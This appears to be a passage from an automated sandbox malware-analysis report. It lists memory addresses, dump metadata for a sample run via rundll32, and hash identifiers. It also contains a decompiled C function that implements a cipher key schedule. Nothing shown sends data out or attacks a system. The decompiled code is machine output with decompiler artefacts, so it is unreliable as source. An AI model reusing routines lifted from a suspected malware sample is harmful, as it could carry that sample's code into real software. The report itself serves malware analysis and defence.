                                        0x21ef3097a54
                                        0x21ef3097a5c
                                        0x21ef3097a5f
                                        0x21ef3097a6c
                                        0x21ef3097a86
                                        0x21ef3097a8a
                                        0x21ef3097a92
                                        0x21ef3097a9a
                                        0x21ef3097aa6
                                        0x21ef3097aaa
                                        0x21ef3097aae
                                        0x21ef3097ab7
                                        0x21ef3097ac0
                                        0x21ef3097ac7
                                        0x21ef3097ad6
                                        0x21ef3097add
                                        0x21ef3097af7
                                        0x21ef3097afb
                                        0x21ef3097b03
                                        0x21ef3097b0b
                                        0x21ef3097b13
                                        0x21ef3097b20
                                        0x21ef3097b41
                                        0x21ef3097b49
                                        0x21ef3097b54
                                        0x21ef3097b63
                                        0x21ef3097b67
                                        0x21ef3097b73
                                        0x21ef3097b7d
                                        0x21ef3097b80
                                        0x21ef3097b83
                                        0x21ef3097b8a
                                        0x21ef3097b94
                                        0x21ef3097b97
                                        0x21ef3097ba4
                                        0x21ef3097ba7
                                        0x21ef3097bae
                                        0x21ef3097bb5
                                        0x21ef3097bb8
                                        0x21ef3097bbe
                                        0x21ef3097bc5
                                        0x21ef3097bcb
                                        0x21ef3097bcd
                                        0x21ef3097bd4
                                        0x21ef3097bdb
                                        0x21ef3097be2
                                        0x21ef3097beb
                                        0x21ef3097bf2
                                        0x21ef3097bf5
                                        0x21ef3097bfb
                                        0x21ef3097c02
                                        0x21ef3097c08
                                        0x21ef3097c0a
                                        0x21ef3097c14
                                        0x21ef3097c24
                                        0x21ef3097c2b
                                        0x21ef3097c32
                                        0x21ef3097c39
                                        0x21ef3097c45
                                        0x21ef3097c4f
                                        0x21ef3097c5e
                                        0x21ef3097c62
                                        0x21ef3097c65
                                        0x21ef3097c6e
                                        0x21ef3097c78
                                        0x21ef3097c84
                                        0x21ef3097c86
                                        0x21ef3097c8d
                                        0x21ef3097c90
                                        0x21ef3097c99
                                        0x21ef3097ca0
                                        0x21ef3097ca7
                                        0x21ef3097cac
                                        0x21ef3097cb0
                                        0x21ef3097cb4
                                        0x21ef3097cba
                                        0x21ef3097cbc
                                        0x21ef3097cc0
                                        0x21ef3097cc3
                                        0x21ef3097cca
                                        0x21ef3097ccd
                                        0x21ef3097cd1
                                        0x21ef3097cd4
                                        0x21ef3097cd8
                                        0x21ef3097cdb
                                        0x21ef3097ce2
                                        0x21ef3097cef
                                        0x21ef3097cf3
                                        0x21ef3097cf6
                                        0x21ef3097cfa
                                        0x21ef3097cfe
                                        0x21ef3097d02
                                        0x21ef3097d05
                                        0x21ef3097d0f
                                        0x21ef3097d16
                                        0x21ef3097d19
                                        0x21ef3097d1f
                                        0x21ef3097d2c
                                        0x21ef3097d32
                                        0x21ef3097d3f
                                        0x21ef3097d49
                                        0x21ef3097d5d
                                        0x21ef3097d71
                                        0x21ef3097d8b
                                        0x21ef3097d92
                                        0x21ef3097d96
                                        0x21ef3097d9a
                                        0x21ef3097da1
                                        0x21ef3097da5
                                        0x21ef3097da9
                                        0x21ef3097daf
                                        0x21ef3097db4
                                        0x21ef3097dbb
                                        0x21ef3097dbe
                                        0x21ef3097dc2
                                        0x21ef3097dc8
                                        0x21ef3097dca
                                        0x21ef3097dd7
                                        0x21ef3097ddc
                                        0x21ef3097de6
                                        0x21ef3097de8
                                        0x21ef3097dec
                                        0x21ef3097def
                                        0x21ef3097df3
                                        0x21ef3097dfd
                                        0x21ef3097e01
                                        0x21ef3097e04
                                        0x21ef3097e0b
                                        0x21ef3097e12
                                        0x21ef3097e15
                                        0x21ef3097e19
                                        0x21ef3097e1c
                                        0x21ef3097e23
                                        0x21ef3097e27
                                        0x21ef3097e37
                                        0x21ef3097e3e
                                        0x21ef3097e45
                                        0x21ef3097e49
                                        0x21ef3097e50
                                        0x21ef3097e5d
                                        0x21ef3097e61
                                        0x21ef3097e6b
                                        0x21ef3097e6f
                                        0x21ef3097e73
                                        0x21ef3097e7a
                                        0x21ef3097e81
                                        0x21ef3097e8d
                                        0x21ef3097e93
                                        0x21ef3097e9b
                                        0x21ef3097ea2
                                        0x21ef3097ea6
                                        0x21ef3097eac
                                        0x21ef3097eb0
                                        0x21ef3097eb2
                                        0x21ef3097eb5
                                        0x21ef3097ebc
                                        0x21ef3097ec4
                                        0x21ef3097ecb
                                        0x21ef3097ece
                                        0x21ef3097ed1
                                        0x21ef3097ed8
                                        0x21ef3097eda
                                        0x21ef3097ee0
                                        0x21ef3097eef
                                        0x21ef3097ef3
                                        0x21ef3097efa
                                        0x21ef3097efc
                                        0x21ef3097f00
                                        0x21ef3097f03
                                        0x21ef3097f0d
                                        0x21ef3097f1d
                                        0x21ef3097f20
                                        0x21ef3097f24
                                        0x21ef3097f27
                                        0x21ef3097f2a
                                        0x21ef3097f34
                                        0x21ef3097f39
                                        0x21ef3097f40
                                        0x21ef3097f43
                                        0x21ef3097f4d
                                        0x21ef3097f51
                                        0x21ef3097f57
                                        0x21ef3097f59
                                        0x21ef3097f65
                                        0x21ef3097f69
                                        0x21ef3097f72
                                        0x21ef3097f7e
                                        0x21ef3097f85
                                        0x21ef3097f9b
                                        0x21ef3097fa2
                                        0x21ef3097fc2
                                        0x21ef3097fc9
                                        0x21ef3097fe4
                                        0x21ef3097ff8

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d2ea031389256458ddc466e3bc3939cc54b08c4a8a8e5f3cc7529937c054e079
                                        • Instruction ID: 69eeba1bef5154cb89529dc22399d3a56b864a8ca10050a3be106e9220a94a65
                                        • Opcode Fuzzy Hash: d2ea031389256458ddc466e3bc3939cc54b08c4a8a8e5f3cc7529937c054e079
                                        • Instruction Fuzzy Hash: E072D5F26242A44FE368CF2E6819F593FD4F358789F82A219DF5A87741D638D520DB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30558F0 Relevance: .8, Instructions: 784COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8a4eb7d73dfb797d28a3a400608f3c90c36aec19ae0905bf572d8b43a0f78ce
                                        • Instruction ID: 1c16e4b1cf229bf7b7d3dc18cb6d3958afd114a37623e10deac74865280b02b8
                                        • Opcode Fuzzy Hash: b8a4eb7d73dfb797d28a3a400608f3c90c36aec19ae0905bf572d8b43a0f78ce
                                        • Instruction Fuzzy Hash: C742D6B3B380A00BD369CB3DE852B697EE0B355348B485428F796D3E41E53DEA149B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30653C0 Relevance: .7, Instructions: 736COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 99%
                                        			E0000021E21EF30653C0(signed int __rax, long long __rbx, signed int __rcx, signed int __rdx, long long __rdi, long long __rsi, void* __r11) {
				signed int _t694;
				signed int _t698;
				unsigned int _t700;
				unsigned int _t704;
				signed int _t706;
				signed int _t710;
				signed int _t817;
				unsigned int _t819;
				unsigned int _t823;
				signed int _t825;
				unsigned int _t829;
				signed int _t831;
				signed int _t834;
				unsigned int _t836;
				unsigned int _t840;
				signed int _t842;
				signed int _t846;
				unsigned int _t848;
				unsigned int _t856;
				signed int _t858;
				signed int _t862;
				unsigned int _t864;
				unsigned int _t868;
				signed int _t870;
				long long _t882;
				void* _t884;
				void* _t889;

				 *((long long*)(_t884 + 8)) = __rbx;
				 *((long long*)(_t884 + 0x10)) = _t882;
				 *((long long*)(_t884 + 0x18)) = __rsi;
				 *((long long*)(_t884 + 0x20)) = __rdi;
				_push(_t889);
				r11d =  *(__rcx + 4) & 0x000000ff;
				r11d = r11d << 8;
				_t817 = ((( *__rcx & 0x000000ff) << 0x00000008 |  *(__rcx + 1) & 0x000000ff) << 0x00000008 |  *(__rcx + 2) & 0x000000ff) << 0x00000008 |  *(__rcx + 3) & 0x000000ff;
				r11d = r11d |  *(__rcx + 5) & 0x000000ff;
				r11d = r11d << 8;
				r11d = r11d |  *(__rcx + 6) & 0x000000ff;
				r11d = r11d << 8;
				r9d = __rdi + 0x61c88647;
				r11d = r11d |  *(__rcx + 7) & 0x000000ff;
				r10d = r11d;
				_t856 = ((( *(__rcx + 8) & 0x000000ff) << 0x00000008 |  *(__rcx + 9) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xa) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xb) & 0x000000ff;
				r9d = r9d + _t856;
				_t694 = ((( *(__rcx + 0xc) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xd) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xe) & 0x000000ff) << 0x00000008 |  *(__rcx + 0xf) & 0x000000ff;
				r10d = r10d - _t694;
				r10d = r10d - 0x61c88647;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *__rdx = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 4) = r8d;
				_t834 = r11d << 0x00000018 ^ _t817 >> 0x00000008;
				r11d = r11d >> 8;
				_t819 = _t817 << 0x00000018 ^ r11d;
				r11d = _t694;
				r11d = r11d >> 0x18;
				r10d = _t819;
				r10d = r10d - _t694;
				r9d = __rsi - 0x3c6ef373;
				r9d = r9d + _t856;
				r10d = r10d + 0x3c6ef373;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r9d = __rsi - 0x78dde6e6;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 8) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r10d = _t819;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				r11d = r11d ^ _t856 << 0x00000008;
				 *(__rdx + 0xc) = r8d;
				r9d = r9d + r11d;
				_t858 = _t856 >> 0x00000018 ^ _t694 << 0x00000008;
				r10d = r10d - _t858;
				r10d = r10d + 0x78dde6e6;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x10) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x14) = r8d;
				_t698 = _t819 << 0x00000018 ^ _t834 >> 0x00000008;
				_t836 = _t834 << 0x00000018 ^ _t819 >> 0x00000008;
				r10d = _t836;
				r10d = r10d - _t858;
				r10d = r10d - 0xe443234;
				r9d = __rbx + 0xe443234;
				r9d = r9d + r11d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r9d = __rbx + 0x1c886467;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x18) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r10d = _t836;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				_t823 = _t858 >> 0x00000018 ^ r11d << 0x00000008;
				 *(__rdx + 0x1c) = r8d;
				r9d = r9d + _t823;
				r11d = r11d >> 0x18;
				r11d = r11d ^ _t858 << 0x00000008;
				r10d = r10d - r11d;
				r10d = r10d - 0x1c886467;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x20) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				_t862 = _t836 << 0x00000018 ^ _t698 >> 0x00000008;
				 *(__rdx + 0x24) = r8d;
				_t700 = _t698 << 0x00000018 ^ _t836 >> 0x00000008;
				r10d = _t700;
				r10d = r10d - r11d;
				r9d = _t882 + 0x3910c8cd;
				r9d = r9d + _t823;
				r11d = r11d << 8;
				r10d = r10d - 0x3910c8cd;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r9d = _t882 + 0x72219199;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x28) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r10d = _t700;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				_t840 = r11d >> 0x00000018 ^ _t823 << 0x00000008;
				 *(__rdx + 0x2c) = r8d;
				r9d = r9d + _t840;
				_t825 = _t823 >> 0x00000018 ^ r11d;
				r10d = r10d - _t825;
				r10d = r10d - 0x72219199;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x30) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r11d = _t700;
				r11d = r11d << 0x18;
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				r11d = r11d ^ _t862 >> 0x00000008;
				 *(__rdx + 0x34) = r8d;
				_t864 = _t862 << 0x00000018 ^ _t700 >> 0x00000008;
				r10d = _t864;
				r10d = r10d - _t825;
				r9d = __r11 - 0x1bbcdccf;
				r9d = r9d + _t840;
				r10d = r10d + 0x1bbcdccf;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r9d = __r11 - 0x3779b99e;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x38) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r10d = _t864;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				_t704 = _t825 >> 0x00000018 ^ _t840 << 0x00000008;
				 *(__rdx + 0x3c) = r8d;
				r9d = r9d + _t704;
				_t842 = _t840 >> 0x00000018 ^ _t825 << 0x00000008;
				r10d = r10d - _t842;
				r10d = r10d + 0x3779b99e;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x40) = r8d;
				r14d = _t864;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r14d = r14d << 0x18;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				r14d = r14d ^ r11d >> 0x00000008;
				 *(__rdx + 0x44) = r8d;
				r11d = r11d << 0x18;
				r11d = r11d ^ _t864 >> 0x00000008;
				r10d = r11d;
				r10d = r10d - _t842;
				r9d = _t889 - 0x6ef3733c;
				r9d = r9d + _t704;
				r10d = r10d + 0x6ef3733c;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r9d = _t889 + 0x22191988;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x48) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r10d = r11d;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				_t868 = _t842 >> 0x00000018 ^ _t704 << 0x00000008;
				r9d = r9d + _t868;
				 *(__rdx + 0x4c) = r8d;
				_t706 = _t704 >> 0x00000018 ^ _t842 << 0x00000008;
				r10d = r10d - _t706;
				r10d = r10d - 0x22191988;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r11d = r11d >> 8;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x50) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				_t846 = r11d << 0x00000018 ^ r14d >> 0x00000008;
				 *(__rdx + 0x54) = r8d;
				r14d = r14d << 0x18;
				r14d = r14d ^ r11d;
				r10d = r14d;
				r10d = r10d - _t706;
				r9d = __rsi + 0x4432330f;
				r9d = r9d + _t868;
				r10d = r10d - 0x4432330f;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r9d = __rsi - 0x779b99e3;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x58) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r10d = r14d;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				_t829 = _t706 >> 0x00000018 ^ _t868 << 0x00000008;
				r9d = r9d + _t829;
				 *(__rdx + 0x5c) = r8d;
				_t870 = _t868 >> 0x00000018 ^ _t706 << 0x00000008;
				r10d = r10d - _t870;
				r10d = r10d + 0x779b99e3;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r11d = _t870;
				r14d = r14d >> 8;
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r11d = r11d >> 0x18;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x60) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				_t710 = r14d << 0x00000018 ^ _t846 >> 0x00000008;
				 *(__rdx + 0x64) = r8d;
				_t848 = _t846 << 0x00000018 ^ r14d;
				r10d = _t848;
				r10d = r10d - _t870;
				r9d = __rbx + 0x10c8cc3a;
				r9d = r9d + _t829;
				r10d = r10d - 0x10c8cc3a;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r9d = __rbx + 0x21919873;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x68) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r10d = _t848;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				r11d = r11d ^ _t829 << 0x00000008;
				r9d = r9d + r11d;
				 *(__rdx + 0x6c) = r8d;
				_t831 = _t829 >> 0x00000018 ^ _t870 << 0x00000008;
				r10d = r10d - _t831;
				r10d = r10d - 0x21919873;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r9d = _t848;
				r9d = r9d << 0x18;
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x70) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				r9d = r9d ^ _t710 >> 0x00000008;
				 *(__rdx + 0x74) = r8d;
				r9d = r9d + 0x432330e5;
				r9d = r9d + r11d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x78) = r8d;
				r8d =  *(0xf3171ff0 + 0xc00 + __rdx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x800 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + 0x400 + __rcx * 4);
				r8d = r8d ^  *(0xf3171ff0 + __rax * 4);
				 *(__rdx + 0x7c) = r8d;
				return (_t710 << 0x00000018 ^ _t848 >> 0x00000008) - _t831 - 0x432330e5 & 0x000000ff;
			}






























                                        0x21ef30653c0
                                        0x21ef30653c5
                                        0x21ef30653ca
                                        0x21ef30653cf
                                        0x21ef30653d6
                                        0x21ef30653eb
                                        0x21ef30653fd
                                        0x21ef3065417
                                        0x21ef306541d
                                        0x21ef3065424
                                        0x21ef3065428
                                        0x21ef306542f
                                        0x21ef3065433
                                        0x21ef306543a
                                        0x21ef3065443
                                        0x21ef306545c
                                        0x21ef3065464
                                        0x21ef3065477
                                        0x21ef306547f
                                        0x21ef3065485
                                        0x21ef3065498
                                        0x21ef30654a3
                                        0x21ef30654b2
                                        0x21ef30654ba
                                        0x21ef30654d3
                                        0x21ef30654d6
                                        0x21ef30654e1
                                        0x21ef30654f0
                                        0x21ef30654f8
                                        0x21ef3065501
                                        0x21ef3065505
                                        0x21ef3065507
                                        0x21ef306550e
                                        0x21ef3065511
                                        0x21ef3065514
                                        0x21ef3065518
                                        0x21ef306551b
                                        0x21ef306551e
                                        0x21ef3065525
                                        0x21ef306552b
                                        0x21ef306554a
                                        0x21ef3065552
                                        0x21ef3065561
                                        0x21ef3065568
                                        0x21ef3065570
                                        0x21ef306558c
                                        0x21ef3065590
                                        0x21ef3065598
                                        0x21ef30655a7
                                        0x21ef30655aa
                                        0x21ef30655b2
                                        0x21ef30655bb
                                        0x21ef30655be
                                        0x21ef30655c2
                                        0x21ef30655cb
                                        0x21ef30655d0
                                        0x21ef30655d6
                                        0x21ef30655e9
                                        0x21ef30655f4
                                        0x21ef3065603
                                        0x21ef306560b
                                        0x21ef3065624
                                        0x21ef3065628
                                        0x21ef3065633
                                        0x21ef3065642
                                        0x21ef306564a
                                        0x21ef306564e
                                        0x21ef306565f
                                        0x21ef3065664
                                        0x21ef306566b
                                        0x21ef306566e
                                        0x21ef3065674
                                        0x21ef306567b
                                        0x21ef3065682
                                        0x21ef306569d
                                        0x21ef30656a5
                                        0x21ef30656b4
                                        0x21ef30656bb
                                        0x21ef30656c3
                                        0x21ef30656df
                                        0x21ef30656e3
                                        0x21ef30656eb
                                        0x21ef30656fa
                                        0x21ef30656fd
                                        0x21ef3065705
                                        0x21ef306570f
                                        0x21ef3065711
                                        0x21ef3065715
                                        0x21ef3065718
                                        0x21ef306571f
                                        0x21ef3065725
                                        0x21ef306572b
                                        0x21ef306573e
                                        0x21ef3065749
                                        0x21ef3065758
                                        0x21ef3065760
                                        0x21ef3065779
                                        0x21ef306577d
                                        0x21ef3065785
                                        0x21ef306579f
                                        0x21ef30657a7
                                        0x21ef30657b0
                                        0x21ef30657b2
                                        0x21ef30657b9
                                        0x21ef30657c1
                                        0x21ef30657c4
                                        0x21ef30657c7
                                        0x21ef30657ce
                                        0x21ef30657d1
                                        0x21ef30657d5
                                        0x21ef30657f4
                                        0x21ef30657fc
                                        0x21ef306580b
                                        0x21ef3065812
                                        0x21ef306581a
                                        0x21ef3065836
                                        0x21ef306583a
                                        0x21ef3065842
                                        0x21ef3065851
                                        0x21ef3065854
                                        0x21ef306585c
                                        0x21ef3065865
                                        0x21ef3065867
                                        0x21ef306586b
                                        0x21ef3065874
                                        0x21ef306587a
                                        0x21ef3065880
                                        0x21ef3065893
                                        0x21ef306589e
                                        0x21ef30658ad
                                        0x21ef30658b5
                                        0x21ef30658c5
                                        0x21ef30658c9
                                        0x21ef30658d1
                                        0x21ef30658e3
                                        0x21ef30658e7
                                        0x21ef30658f6
                                        0x21ef30658fe
                                        0x21ef3065907
                                        0x21ef306590a
                                        0x21ef3065911
                                        0x21ef3065918
                                        0x21ef306591b
                                        0x21ef306591e
                                        0x21ef3065925
                                        0x21ef306592b
                                        0x21ef306594a
                                        0x21ef3065952
                                        0x21ef3065961
                                        0x21ef3065968
                                        0x21ef3065970
                                        0x21ef306598c
                                        0x21ef3065990
                                        0x21ef3065998
                                        0x21ef30659a7
                                        0x21ef30659aa
                                        0x21ef30659b2
                                        0x21ef30659bb
                                        0x21ef30659bd
                                        0x21ef30659c1
                                        0x21ef30659ca
                                        0x21ef30659cf
                                        0x21ef30659d5
                                        0x21ef30659e8
                                        0x21ef30659f3
                                        0x21ef3065a02
                                        0x21ef3065a0a
                                        0x21ef3065a0e
                                        0x21ef3065a18
                                        0x21ef3065a2d
                                        0x21ef3065a38
                                        0x21ef3065a47
                                        0x21ef3065a4b
                                        0x21ef3065a53
                                        0x21ef3065a5d
                                        0x21ef3065a60
                                        0x21ef3065a64
                                        0x21ef3065a68
                                        0x21ef3065a70
                                        0x21ef3065a73
                                        0x21ef3065a76
                                        0x21ef3065a7d
                                        0x21ef3065a83
                                        0x21ef3065aa2
                                        0x21ef3065aaa
                                        0x21ef3065ab9
                                        0x21ef3065ac0
                                        0x21ef3065ac8
                                        0x21ef3065ae4
                                        0x21ef3065ae8
                                        0x21ef3065af0
                                        0x21ef3065aff
                                        0x21ef3065b02
                                        0x21ef3065b0a
                                        0x21ef3065b13
                                        0x21ef3065b18
                                        0x21ef3065b1b
                                        0x21ef3065b1f
                                        0x21ef3065b27
                                        0x21ef3065b2d
                                        0x21ef3065b40
                                        0x21ef3065b48
                                        0x21ef3065b62
                                        0x21ef3065b66
                                        0x21ef3065b6e
                                        0x21ef3065b8a
                                        0x21ef3065b8e
                                        0x21ef3065b96
                                        0x21ef3065ba8
                                        0x21ef3065bb0
                                        0x21ef3065bba
                                        0x21ef3065bbc
                                        0x21ef3065bc0
                                        0x21ef3065bc4
                                        0x21ef3065bc7
                                        0x21ef3065bca
                                        0x21ef3065bcd
                                        0x21ef3065bd4
                                        0x21ef3065bda
                                        0x21ef3065bf9
                                        0x21ef3065c01
                                        0x21ef3065c10
                                        0x21ef3065c17
                                        0x21ef3065c1f
                                        0x21ef3065c3b
                                        0x21ef3065c3f
                                        0x21ef3065c47
